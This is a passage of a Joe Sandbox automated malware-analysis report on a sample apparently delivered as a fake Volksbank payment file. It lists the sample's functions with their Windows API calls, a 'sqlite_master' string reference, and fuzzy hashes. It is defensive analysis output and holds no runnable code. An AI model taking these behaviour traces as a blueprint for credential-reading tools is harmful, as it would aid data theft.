                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                                          Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                                                                          • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                                                                          • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                                                                                          • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                                                          Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1127616056-0
                                                                                                                                                                                                                                          • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                                                          Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                          • String ID: sqlite_master
                                                                                                                                                                                                                                          • API String ID: 438689982-3163232059
                                                                                                                                                                                                                                          • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                                                                                          • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                                                          Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3917621476-0
                                                                                                                                                                                                                                          • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                                                                          • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                                                          Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 822687973-0
                                                                                                                                                                                                                                          • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                                                                                          • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                                                          Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7693DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7693DF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0041747F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2605342592-0
                                                                                                                                                                                                                                          • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                                                          Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                                                                                                                                                          • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2678498856-0
                                                                                                                                                                                                                                          • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                                                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                                                          Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$Item
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3888421826-0
                                                                                                                                                                                                                                          • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                                          • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                                                          Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3727323765-0
                                                                                                                                                                                                                                          • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                                                                                          • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                                                          Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                                                          • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                                                                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                                          Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                                                          • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                                                                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                                          Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                                                          • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                                                                                                          • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                                                          Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 764393265-0
                                                                                                                                                                                                                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                                                          Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                                          Memory Dump Source
